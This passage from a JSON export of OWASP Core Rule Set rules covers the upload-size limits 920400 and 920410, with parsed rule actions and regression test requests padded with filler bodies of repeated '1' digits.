"lineno": 843, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 844, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 842 } }, { "rule_id": "920400", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "MAX_FILE_SIZE", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Uploaded file size too large", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/form-data; boundary=--------111111111", "Content-Length": "64200" }, "data": "----------111111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file.txt\"\nContent-Type: text/plain\n{{ \"1\" | repeat 64200 }}\n----------111111111--\n" }, "expected": { "should_block": true, "rule_ids": [ 920400 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------111111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file.txt\"\nContent-Type: text/plain\n{{ \"1\" | repeat 64200 }}\n----------111111111--\n" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/form-data; boundary=--------111111" }, "data": "----------111111\nContent-Disposition: form-data; name=\"smallfile\"; filename=\"file.txt\"\nContent-Type: text/plain\n{{ \"1\" | repeat 152 }}\n----------111111--\n" }, "expected": { "should_block": false, "rule_ids": [ 920400 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------111111\nContent-Disposition: form-data; name=\"smallfile\"; filename=\"file.txt\"\nContent-Type: text/plain\n{{ \"1\" | repeat 152 }}\n----------111111--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 851, "variables": [ { "variable": "TX", "variable_part": "MAX_FILE_SIZE", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 852, "act_quote": "no_quote", "act_arg": "920400", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 853, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 854, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 855, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 856, "act_quote": "quotes", "act_arg": "Uploaded file size too large", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 857, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 858, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 859, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 860, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 861, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 862, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 863, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 864, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 865, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 866, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 867, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 851 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?i)multipart/form-data", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 868, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?i)multipart/form-data", "actions": [ { "act_name": "chain", "lineno": 869, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 868 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.max_file_size}", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 870, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "%{tx.max_file_size}", "actions": [ { "act_name": "t", "lineno": 871, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 872, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 870 } }, { "rule_id": "920410", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "COMBINED_FILE_SIZES", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Total uploaded files size too large", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/form-data; boundary=--------111111" }, "data": "----------111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\